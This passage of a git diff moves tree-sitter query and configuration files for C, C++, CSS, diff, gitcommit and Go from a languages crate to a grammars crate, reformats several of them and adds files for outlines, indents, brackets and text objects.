"^/\\*")) + (#match? @indent "^/\\*")) (if_statement) @start.if + (for_statement) @start.for + (while_statement) @start.while + (do_statement) @start.do + (switch_statement) @start.switch + (else_clause) @start.else diff --git a/crates/languages/src/c/injections.scm b/crates/grammars/src/c/injections.scm similarity index 54% rename from crates/languages/src/c/injections.scm rename to crates/grammars/src/c/injections.scm index 9ec3cf1f780123426f681ad758179b81697e59c5..010c697f08adec1d196833b4de492027a80960a4 100644 --- a/crates/languages/src/c/injections.scm +++ b/crates/grammars/src/c/injections.scm @@ -1,6 +1,5 @@ ((comment) @injection.content - (#set! injection.language "comment") -) + (#set! injection.language "comment")) ((comment) @injection.content (#match? @injection.content "^(///|//!|/\\*\\*|/\\*!)(.*)") @@ -8,9 +7,9 @@ (#set! injection.include-children)) (preproc_def - value: (preproc_arg) @injection.content - (#set! injection.language "c")) + value: (preproc_arg) @injection.content + (#set! injection.language "c")) (preproc_function_def - value: (preproc_arg) @injection.content - (#set! injection.language "c")) + value: (preproc_arg) @injection.content + (#set! injection.language "c")) diff --git a/crates/grammars/src/c/outline.scm b/crates/grammars/src/c/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..abc9608343826545b9ebfd5f915d6352943911f6 --- /dev/null +++ b/crates/grammars/src/c/outline.scm @@ -0,0 +1,89 @@ +(preproc_def + "#define" @context + name: (_) @name) @item + +(preproc_function_def + "#define" @context + name: (_) @name + parameters: (preproc_params + "(" @context + ")" @context)) @item + +(struct_specifier + "struct" @context + name: (_) @name) @item + +(union_specifier + "union" @context + name: (_) @name) @item + +(enum_specifier + "enum" @context + name: (_) @name) @item + +(enumerator + name: (_) @name) @item + +(field_declaration + type: (_) @context + declarator: (field_identifier) @name) @item + +(type_definition + "typedef" @context + declarator: (_) @name) @item + +(declaration + (type_qualifier)? @context + type: (_)? @context + declarator: [ + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + ]) @item + +(function_definition + (type_qualifier)? @context + type: (_)? @context + declarator: [ + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + ]) @item + +(comment) @annotation diff --git a/crates/languages/src/c/overrides.scm b/crates/grammars/src/c/overrides.scm similarity index 98% rename from crates/languages/src/c/overrides.scm rename to crates/grammars/src/c/overrides.scm index 36473eb300fd01370e1947873435a821e2d6417a..7c4cf69697200efa1cedd59b895d5ebd064ce486 100644 --- a/crates/languages/src/c/overrides.scm +++ b/crates/grammars/src/c/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string_literal) @string diff --git a/crates/grammars/src/c/runnables.scm b/crates/grammars/src/c/runnables.scm new file mode 100644 index 0000000000000000000000000000000000000000..50c5ef5b71b4df5d0735a6a5019e9aee5a19f083 --- /dev/null +++ b/crates/grammars/src/c/runnables.scm @@ -0,0 +1,6 @@ +; Tag the main function +((function_definition + declarator: (function_declarator + declarator: (identifier) @run)) @_c-main + (#eq? @run "main") + (#set! tag c-main)) diff --git a/crates/grammars/src/c/textobjects.scm b/crates/grammars/src/c/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..fd5ec0b49b7484a8ef2cbb7cb321f7020bdaeff8 --- /dev/null +++ b/crates/grammars/src/c/textobjects.scm @@ -0,0 +1,34 @@ +(declaration + declarator: (function_declarator)) @function.around + +(function_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(preproc_function_def + value: (_) @function.inside) @function.around + +(comment) @comment.around + +(struct_specifier + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(enum_specifier + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(union_specifier + body: (_ + "{" + (_)* @class.inside + "}")) @class.around diff --git a/crates/grammars/src/cpp/brackets.scm b/crates/grammars/src/cpp/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..e0330c9b1f2ebdd45480c54e9053503a6b6f611b --- /dev/null +++ b/crates/grammars/src/cpp/brackets.scm @@ -0,0 +1,19 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("<" @open + ">" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/cpp/config.toml b/crates/grammars/src/cpp/config.toml similarity index 82% rename from crates/languages/src/cpp/config.toml rename to crates/grammars/src/cpp/config.toml index 10c36a6ded1e1f3a1204d1e15af47fee78b8e049..138d4a78e45f153eaa2eeb72a91654416154ed33 100644 --- a/crates/languages/src/cpp/config.toml +++ b/crates/grammars/src/cpp/config.toml @@ -1,6 +1,7 @@ name = "C++" grammar = "cpp" -path_suffixes = ["cc", "hh", "cpp", "h", "hpp", "cxx", "hxx", "c++", "h++", "ipp", "inl", "ino", "ixx", "cu", "cuh", "C", "H"] +path_suffixes = ["cc", "ccm", "hh", "cpp", "cppm", "h", "hpp", "cxx", "cxxm", "hxx", "c++", "c++m", "h++", "ipp", "inl", "ino", "ixx", "cu", "cuh", "C", "H"] +modeline_aliases = ["c++", "cpp", "cxx"] line_comments = ["// ", "/// ", "//! "] first_line_pattern = '^//.*-\*-\s*C\+\+\s*-\*-' decrease_indent_patterns = [ @@ -18,4 +19,3 @@ brackets = [ ] debuggers = ["CodeLLDB", "GDB"] documentation_comment = { start = "/*", prefix = "* ", end = "*/", tab_size = 1 } -import_path_strip_regex = "^<|>$" diff --git a/crates/languages/src/cpp/highlights.scm b/crates/grammars/src/cpp/highlights.scm similarity index 90% rename from crates/languages/src/cpp/highlights.scm rename to crates/grammars/src/cpp/highlights.scm index dbb79e69b04e351ca231b45b21507e305b2cabf5..281da4215c8269172816c6f37a5e6e866c04a140 100644 --- a/crates/languages/src/cpp/highlights.scm +++ b/crates/grammars/src/cpp/highlights.scm @@ -1,13 +1,15 @@ (identifier) @variable + (field_identifier) @property + (namespace_identifier) @namespace (concept_definition - name: (identifier) @concept) + name: (identifier) @concept) (requires_clause - constraint: (template_type - name: (type_identifier) @concept)) + constraint: (template_type + name: (type_identifier) @concept)) (module_name (identifier) @module) @@ -83,18 +85,23 @@ (operator_name "<=>" @operator.spaceship) -(destructor_name (identifier) @function) +(destructor_name + (identifier) @function) ((namespace_identifier) @type - (#match? @type "^[A-Z]")) + (#match? @type "^[A-Z]")) (auto) @type + (type_identifier) @type + type: (primitive_type) @type.builtin + (sized_type_specifier) @type.builtin ; GNU __attribute__ (attribute_specifier) @attribute + (attribute_specifier (argument_list (identifier) @attribute)) @@ -102,15 +109,18 @@ type: (primitive_type) @type.builtin ; C++11 [[attributes]] (attribute prefix: (identifier) @attribute) + (attribute name: (identifier) @attribute) ((identifier) @constant.builtin - (#match? @constant.builtin "^_*[A-Z][A-Z\\d_]*$")) + (#match? @constant.builtin "^_*[A-Z][A-Z\\d_]*$")) (statement_identifier) @label + (this) @variable.builtin -("static_assert") @function.builtin + +"static_assert" @function.builtin [ "alignas" @@ -186,7 +196,7 @@ type: (primitive_type) @type.builtin "#ifndef" "#include" (preproc_directive) -] @preproc +] @keyword.preproc @preproc (comment) @comment @@ -197,7 +207,7 @@ type: (primitive_type) @type.builtin [ (null) - ("nullptr") + "nullptr" ] @constant.builtin (number_literal) @number @@ -285,5 +295,8 @@ type: (primitive_type) @type.builtin (binary_expression operator: "<=>" @operator.spaceship) -(conditional_expression ":" @operator) -(user_defined_literal (literal_suffix) @operator) +(conditional_expression + ":" @operator) + +(user_defined_literal + (literal_suffix) @operator) diff --git a/crates/grammars/src/cpp/indents.scm b/crates/grammars/src/cpp/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..0b55631e5ca6cdfca377f5bf4018d751cdf31bf4 --- /dev/null +++ b/crates/grammars/src/cpp/indents.scm @@ -0,0 +1,33 @@ +[ + (field_expression) + (assignment_expression) + (init_declarator) + (if_statement) + (for_statement) + (while_statement) + (do_statement) + (else_clause) +] @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent + +((comment) @indent + (#match? @indent "^/\\*")) + +(if_statement) @start.if + +(for_statement) @start.for + +(while_statement) @start.while + +(do_statement) @start.do + +(switch_statement) @start.switch + +(else_clause) @start.else diff --git a/crates/languages/src/cpp/injections.scm b/crates/grammars/src/cpp/injections.scm similarity index 63% rename from crates/languages/src/cpp/injections.scm rename to crates/grammars/src/cpp/injections.scm index 60c6ea7b63eb6dcb7e1bae02c66045266c0b6cd5..0f622d4edbada60d162e14260dfb1d05423cd503 100644 --- a/crates/languages/src/cpp/injections.scm +++ b/crates/grammars/src/cpp/injections.scm @@ -1,6 +1,5 @@ ((comment) @injection.content - (#set! injection.language "comment") -) + (#set! injection.language "comment")) ((comment) @injection.content (#match? @injection.content "^(///|//!|/\\*\\*|/\\*!)(.*)") @@ -8,12 +7,12 @@ (#set! injection.include-children)) (preproc_def - value: (preproc_arg) @injection.content - (#set! injection.language "c++")) + value: (preproc_arg) @injection.content + (#set! injection.language "c++")) (preproc_function_def - value: (preproc_arg) @injection.content - (#set! injection.language "c++")) + value: (preproc_arg) @injection.content + (#set! injection.language "c++")) (raw_string_literal delimiter: (raw_string_delimiter) @injection.language diff --git a/crates/grammars/src/cpp/outline.scm b/crates/grammars/src/cpp/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..041ff7d1b02ec0be14aead872c5436b2c897e125 --- /dev/null +++ b/crates/grammars/src/cpp/outline.scm @@ -0,0 +1,195 @@ +(preproc_def + "#define" @context + name: (_) @name) @item + +(preproc_function_def + "#define" @context + name: (_) @name + parameters: (preproc_params + "(" @context + ")" @context)) @item + +(namespace_definition + "inline"? @context + "namespace" @context + name: (_) @name) @item + +(type_definition + "typedef" @context + declarator: (_) @name) @item + +(struct_specifier + "struct" @context + name: (_) @name) @item + +(class_specifier + "class" @context + name: (_) @name) @item + +(enum_specifier + "enum" @context + [ + "class" + "struct" + ]? @context + name: (_) @name) @item + +(union_specifier + "union" @context + name: (_) @name) @item + +(enumerator + name: (_) @name) @item + +(concept_definition + "concept" @context + name: (_) @name) @item + +(declaration + [ + (storage_class_specifier) + (type_qualifier) + ]* @context + type: (_) @context + declarator: [ + ; The declaration may define multiple variables, using @item on the + ; declarator so that they get distinct ranges. + (init_declarator + declarator: (_) @item @name) + (identifier) @item @name + ] @item) + +(function_definition + [ + (storage_class_specifier) + (type_qualifier) + ]* @context + type: (_)? @context + declarator: [ + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + (reference_declarator + [ + "&" + "&&" + ] @context + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + ] + (type_qualifier)? @context) @item + +(declaration + [ + (storage_class_specifier) + (type_qualifier) + ]* @context + type: (_)? @context + declarator: [ + (field_identifier) @name + (pointer_declarator + "*" @context + declarator: (field_identifier) @name) + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + (reference_declarator + [ + "&" + "&&" + ] @context + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + ] + (type_qualifier)? @context) @item + +(field_declaration + [ + (storage_class_specifier) + (type_qualifier) + ]* @context + type: (_) @context + declarator: [ + (field_identifier) @name + (pointer_declarator + "*" @context + declarator: (field_identifier) @name) + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)) + (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + (pointer_declarator + "*" @context + declarator: (pointer_declarator + "*" @context + declarator: (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context)))) + (reference_declarator + [ + "&" + "&&" + ] @context + (function_declarator + declarator: (_) @name + parameters: (parameter_list + "(" @context + ")" @context))) + ; Fields declarations may define multiple fields, and so @item is on the + ; declarator so they each get distinct ranges. + ] @item + (type_qualifier)? @context) + +(comment) @annotation diff --git a/crates/languages/src/cpp/overrides.scm b/crates/grammars/src/cpp/overrides.scm similarity index 98% rename from crates/languages/src/cpp/overrides.scm rename to crates/grammars/src/cpp/overrides.scm index 36473eb300fd01370e1947873435a821e2d6417a..7c4cf69697200efa1cedd59b895d5ebd064ce486 100644 --- a/crates/languages/src/cpp/overrides.scm +++ b/crates/grammars/src/cpp/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string_literal) @string diff --git a/crates/grammars/src/cpp/semantic_token_rules.json b/crates/grammars/src/cpp/semantic_token_rules.json new file mode 100644 index 0000000000000000000000000000000000000000..627a5c5f187b47918e6a56069c5ed1bda8583aa6 --- /dev/null +++ b/crates/grammars/src/cpp/semantic_token_rules.json @@ -0,0 +1,7 @@ +[ + { + "token_type": "variable", + "token_modifiers": ["readonly"], + "style": ["constant"] + } +] diff --git a/crates/grammars/src/cpp/textobjects.scm b/crates/grammars/src/cpp/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..61260cd814689aef68ca785132929963eb12d54f --- /dev/null +++ b/crates/grammars/src/cpp/textobjects.scm @@ -0,0 +1,44 @@ +(declaration + declarator: (function_declarator)) @function.around + +(function_definition + body: (_ + "{" + (_)* @function.inside + "}")) @function.around + +(preproc_function_def + value: (_) @function.inside) @function.around + +(comment) @comment.around + +(struct_specifier + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(enum_specifier + body: (_ + "{" + [ + (_) + ","? + ]* @class.inside + "}")) @class.around + +(union_specifier + body: (_ + "{" + (_)* @class.inside + "}")) @class.around + +(class_specifier + body: (_ + "{" + [ + (_) + ":"? + ";"? + ]* @class.inside + "}"?)) @class.around diff --git a/crates/grammars/src/css/brackets.scm b/crates/grammars/src/css/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..313d212a5eb28d006775781576d50e359be675a2 --- /dev/null +++ b/crates/grammars/src/css/brackets.scm @@ -0,0 +1,16 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("'" @open + "'" @close) + (#set! rainbow.exclude)) diff --git a/crates/languages/src/css/config.toml b/crates/grammars/src/css/config.toml similarity index 100% rename from crates/languages/src/css/config.toml rename to crates/grammars/src/css/config.toml diff --git a/crates/languages/src/css/highlights.scm b/crates/grammars/src/css/highlights.scm similarity index 76% rename from crates/languages/src/css/highlights.scm rename to crates/grammars/src/css/highlights.scm index 8fbb9f47d2bcdde1a3b20a184885efb5382557a8..b9d708b661b221544fb58a767981d868d33cb9f7 100644 --- a/crates/languages/src/css/highlights.scm +++ b/crates/grammars/src/css/highlights.scm @@ -30,14 +30,24 @@ ] @keyword.operator (id_name) @selector.id + (class_name) @selector.class (namespace_name) @namespace -(namespace_selector (tag_name) @namespace "|") + +(namespace_selector + (tag_name) @namespace + "|") (attribute_name) @attribute -(pseudo_element_selector "::" (tag_name) @selector.pseudo) -(pseudo_class_selector ":" (class_name) @selector.pseudo) + +(pseudo_element_selector + "::" + (tag_name) @selector.pseudo) + +(pseudo_class_selector + ":" + (class_name) @selector.pseudo) [ (feature_name) @@ -58,13 +68,11 @@ (parenthesized_query (keyword_query) @property) -( - [ - (property_name) - (plain_value) - ] @variable - (#match? @variable "^--") -) +([ + (property_name) + (plain_value) +] @variable + (#match? @variable "^--")) [ "@media" @@ -80,6 +88,7 @@ ] @keyword (string_value) @string + (color_value) @string.special [ @@ -97,7 +106,8 @@ ";" ] @punctuation.delimiter -(id_selector "#" @punctuation.delimiter) +(id_selector + "#" @punctuation.delimiter) [ "{" diff --git a/crates/grammars/src/css/indents.scm b/crates/grammars/src/css/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..a768bb040790087fa905c09a436e81c923db240a --- /dev/null +++ b/crates/grammars/src/css/indents.scm @@ -0,0 +1,3 @@ +(_ + "{" + "}" @end) @indent diff --git a/crates/grammars/src/css/injections.scm b/crates/grammars/src/css/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/css/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/grammars/src/css/outline.scm b/crates/grammars/src/css/outline.scm new file mode 100644 index 0000000000000000000000000000000000000000..6e6e9d3a03c7efd4e7d1814e74705ba3c34e20a1 --- /dev/null +++ b/crates/grammars/src/css/outline.scm @@ -0,0 +1,16 @@ +(stylesheet + (import_statement + "@import" @context + (string_value) @name) @item) + +(rule_set + (selectors + . + (_) @name + ("," @name + (_) @name)*)) @item + +(media_statement + "@media" @context + (_) @name + (block)) @item diff --git a/crates/languages/src/css/overrides.scm b/crates/grammars/src/css/overrides.scm similarity index 98% rename from crates/languages/src/css/overrides.scm rename to crates/grammars/src/css/overrides.scm index e5eade479723c33894b6165085603631bdfe8c64..7ca202fd7bc3db34dd71d5ae7893efe853101ced 100644 --- a/crates/languages/src/css/overrides.scm +++ b/crates/grammars/src/css/overrides.scm @@ -1,2 +1,3 @@ (comment) @comment.inclusive + (string_value) @string diff --git a/crates/grammars/src/css/textobjects.scm b/crates/grammars/src/css/textobjects.scm new file mode 100644 index 0000000000000000000000000000000000000000..88ae6bb8423feec432de6e168507233c1f293b09 --- /dev/null +++ b/crates/grammars/src/css/textobjects.scm @@ -0,0 +1,31 @@ +(comment) @comment.around + +(rule_set + (block + ("{" + (_)* @function.inside + "}"))) @function.around + +(keyframe_block + (block + ("{" + (_)* @function.inside + "}"))) @function.around + +(media_statement + (block + ("{" + (_)* @class.inside + "}"))) @class.around + +(supports_statement + (block + ("{" + (_)* @class.inside + "}"))) @class.around + +(keyframes_statement + (keyframe_block_list + ("{" + (_)* @class.inside + "}"))) @class.around diff --git a/crates/languages/src/diff/config.toml b/crates/grammars/src/diff/config.toml similarity index 100% rename from crates/languages/src/diff/config.toml rename to crates/grammars/src/diff/config.toml diff --git a/crates/languages/src/diff/highlights.scm b/crates/grammars/src/diff/highlights.scm similarity index 66% rename from crates/languages/src/diff/highlights.scm rename to crates/grammars/src/diff/highlights.scm index 4a344389032b9ff12f7c00e42adffb00721737e1..3c9abbe147b6554d6894d5d8d3c8bcf5d93e2edd 100644 --- a/crates/languages/src/diff/highlights.scm +++ b/crates/grammars/src/diff/highlights.scm @@ -3,14 +3,12 @@ [ (addition) (new_file) -] @string -;; TODO: This should eventually be `@diff.plus` with a fallback of `@string` +] @string @diff.plus [ (deletion) (old_file) -] @keyword -;; TODO: This should eventually be `@diff.minus` with a fallback of `@keyword` +] @keyword @diff.minus (commit) @constant @@ -22,7 +20,7 @@ (mode) @number -([ +[ ".." "+" "++" @@ -32,7 +30,7 @@ "--" "---" "----" -] @punctuation.special) +] @punctuation.special [ (binary_change) diff --git a/crates/grammars/src/diff/injections.scm b/crates/grammars/src/diff/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/crates/grammars/src/diff/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/crates/languages/src/gitcommit/config.toml b/crates/grammars/src/gitcommit/config.toml similarity index 96% rename from crates/languages/src/gitcommit/config.toml rename to crates/grammars/src/gitcommit/config.toml index c2421ce00613e5848aacab5d1230ab839c8b1388..83cd6f550e3f18c5d8cb61efa4d632ece6c1ad4d 100644 --- a/crates/languages/src/gitcommit/config.toml +++ b/crates/grammars/src/gitcommit/config.toml @@ -7,7 +7,7 @@ path_suffixes = [ "NOTES_EDITMSG", "EDIT_DESCRIPTION", ] -line_comments = ["#"] +line_comments = ["# "] brackets = [ { start = "(", end = ")", close = true, newline = false }, { start = "`", end = "`", close = true, newline = false }, diff --git a/crates/languages/src/gitcommit/highlights.scm b/crates/grammars/src/gitcommit/highlights.scm similarity index 52% rename from crates/languages/src/gitcommit/highlights.scm rename to crates/grammars/src/gitcommit/highlights.scm index 8670a6615aa49b8062a1ef2375884bf298b1df76..750a400f2b147c459d1a7932cd476286dc8189fc 100644 --- a/crates/languages/src/gitcommit/highlights.scm +++ b/crates/grammars/src/gitcommit/highlights.scm @@ -1,18 +1,36 @@ (subject) @markup.heading + (path) @string.special.path + (branch) @string.special.symbol + (commit) @constant + (item) @markup.link.url + (header) @tag + (comment) @comment -(change kind: "new file" @diff.plus) -(change kind: "deleted" @diff.minus) -(change kind: "modified" @diff.delta) -(change kind: "renamed" @diff.delta.moved) +(change + kind: "new file" @diff.plus) + +(change + kind: "deleted" @diff.minus) + +(change + kind: "modified" @diff.delta) + +(change + kind: "renamed" @diff.delta.moved) (trailer key: (trailer_key) @variable.other.member value: (trailer_value) @string) -[":" "=" "->" (scissors)] @punctuation.delimiter +[ + ":" + "=" + "->" + (scissors) +] @punctuation.delimiter diff --git a/crates/grammars/src/gitcommit/injections.scm b/crates/grammars/src/gitcommit/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..07c2dd95ca69642b15a7a778ab7e0caad47586cb --- /dev/null +++ b/crates/grammars/src/gitcommit/injections.scm @@ -0,0 +1,8 @@ +((comment) @content + (#set! injection.language "comment")) + +((scissors) @content + (#set! "language" "diff")) + +((rebase_command) @content + (#set! "language" "git_rebase")) diff --git a/crates/grammars/src/go/brackets.scm b/crates/grammars/src/go/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..6bee4099173ee83cc03e4f1d24d7000d102880fb --- /dev/null +++ b/crates/grammars/src/go/brackets.scm @@ -0,0 +1,19 @@ +("(" @open + ")" @close) + +("[" @open + "]" @close) + +("{" @open + "}" @close) + +(("\"" @open + "\"" @close) + (#set! rainbow.exclude)) + +(("`" @open + "`" @close) + (#set! rainbow.exclude)) + +((rune_literal) @open @close + (#set! rainbow.exclude)) diff --git a/crates/languages/src/go/config.toml b/crates/grammars/src/go/config.toml similarity index 96% rename from crates/languages/src/go/config.toml rename to crates/grammars/src/go/config.toml index c8589b14d68aa66cd189940c65618b7736b4bfd7..36f885d75fe623eb16b306f0481ac7677ab0d35b 100644 --- a/crates/languages/src/go/config.toml +++ b/crates/grammars/src/go/config.toml @@ -1,6 +1,7 @@ name = "Go" grammar = "go" path_suffixes = ["go"] +modeline_aliases = ["golang"] line_comments = ["// "] first_line_pattern = '^//.*\bgo run\b' autoclose_before = ";:.,=}])>" diff --git a/crates/grammars/src/go/debugger.scm b/crates/grammars/src/go/debugger.scm new file mode 100644 index 0000000000000000000000000000000000000000..306b0448a7d817040562152b39d410100b207f1a --- /dev/null +++ b/crates/grammars/src/go/debugger.scm @@ -0,0 +1,44 @@ +(parameter_declaration + (identifier) @debug-variable) + +(short_var_declaration + (expression_list + (identifier) @debug-variable)) + +(var_declaration + (var_spec + (identifier) @debug-variable)) + +(const_declaration + (const_spec + (identifier) @debug-variable)) + +(assignment_statement + (expression_list + (identifier) @debug-variable)) + +(binary_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(call_expression + (argument_list + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]"))) + +(return_statement + (expression_list + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]"))) + +(range_clause + (expression_list + (identifier) @debug-variable)) + +(parenthesized_expression + (identifier) @debug-variable + (#not-match? @debug-variable "^[A-Z]")) + +(block) @debug-scope + +(function_declaration) @debug-scope diff --git a/crates/languages/src/go/highlights.scm b/crates/grammars/src/go/highlights.scm similarity index 95% rename from crates/languages/src/go/highlights.scm rename to crates/grammars/src/go/highlights.scm index 15a512d6b7e359bf7290aee9d433f1ae7be352ec..670b4f05a961e35d3826c294d061ea7757fd1c0f 100644 --- a/crates/languages/src/go/highlights.scm +++ b/crates/grammars/src/go/highlights.scm @@ -1,10 +1,12 @@ (identifier) @variable (type_identifier) @type + (type_spec name: (type_identifier) @type.definition) (field_identifier) @property + (package_identifier) @namespace (label_name) @label @@ -26,6 +28,7 @@ (method_declaration name: (field_identifier) @function.method) + (method_elem name: (field_identifier) @function.method) @@ -144,8 +147,7 @@ ; Go directives ((comment) @preproc - (#match? @preproc "^//go:")) + (#match? @preproc "^//go:")) ((comment) @preproc - (#match? @preproc "^// \\+build")) - + (#match? @preproc "^// \\+build")) diff --git a/crates/grammars/src/go/indents.scm b/crates/grammars/src/go/indents.scm new file mode 100644 index 0000000000000000000000000000000000000000..21e8cf7abbc1420ba94063a7ae6655ec0daa9baa --- /dev/null +++ b/crates/grammars/src/go/indents.scm @@ -0,0 +1,17 @@ +[ + (assignment_statement) + (call_expression) + (selector_expression) +] @indent + +(_ + "[" + "]" @end) @indent + +(_ + "{" + "}" @end) @indent + +(_ + "(" + ")" @end) @indent diff --git a/crates/grammars/src/go/injections.scm b/crates/grammars/src/go/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..73cf0bd352de0213f9a0d1efff300039f52a0697 --- /dev/null +++ b/crates/grammars/src/go/injections.scm @@ -0,0 +1,730 @@ +; Refer to https://github.com/nvim-treesitter/nvim-treesitter/blob/master/queries/go/injections.scm#L4C1-L16C41 +((comment) @injection.content + (#set! injection.language "comment")) + +(call_expression + (selector_expression) @_function + (#any-of? @_function + "regexp.Match" "regexp.MatchReader" "regexp.MatchString" "regexp.Compile" "regexp.CompilePOSIX" + "regexp.MustCompile" "regexp.MustCompilePOSIX") + (argument_list + . + [ + (raw_string_literal) + (interpreted_string_literal) + ] @injection.content + (#set! injection.language "regex"))) + +; INJECT SQL +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*sql\\s*\\*\\/$") + (#set! injection.language "sql")) + +; INJECT JSON +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (short_var_declaration + left: (expression_list) + ":=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (composite_literal + body: (literal_value + (keyed_element + (comment) @_comment + value: (literal_element + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])))) + (expression_statement + (call_expression + (argument_list + (comment) @_comment + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ]))) +] + (#match? @_comment "^\\/\\*\\s*json\\s*\\*\\/") + ; /* json */ or /*json*/ + (#set! injection.language "json")) + +; INJECT YAML +([ + (const_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (var_spec + name: (identifier) + "=" + (comment) @_comment + value: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + ])) + (assignment_statement + left: (expression_list) + "=" + (comment) @_comment + right: (expression_list + [ + (interpreted_string_literal + (interpreted_string_literal_content) @injection.content) + (raw_string_literal + (raw_string_literal_content) @injection.content) + 